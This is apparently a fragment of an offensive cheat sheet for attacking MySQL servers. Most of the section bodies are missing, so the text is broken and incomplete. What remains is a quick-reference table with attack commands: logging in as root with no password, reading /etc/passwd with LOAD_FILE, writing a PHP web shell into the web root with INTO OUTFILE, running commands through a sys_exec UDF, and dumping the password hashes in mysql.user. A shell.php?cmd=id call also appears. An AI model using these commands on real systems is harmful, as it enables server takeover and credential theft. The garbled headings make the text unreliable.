Service Detection
Connect
Brute-Force
root / (blank).
Enumeration
File Read
FILE privilege.
File Write (Web Shell)
UDF Command Execution
IfFILE + INSERT privilege:
Linux
Windows
Password Hashes
Log Poisoning → RCE
http://TARGET/shell.php?cmd=id
NSE Scripts
Quick Reference
| Check | Command |
|---|---|
| Connect | mysql -h TARGET -u root |
| Read file | SELECT LOAD_FILE('/etc/passwd') |
| Write shell | SELECT "<?php..." INTO OUTFILE '/var/www/html/shell.php' |
| UDF RCE | CREATE FUNCTION sys_exec... |
| Dump hashes | SELECT user, authentication_string FROM mysql.user |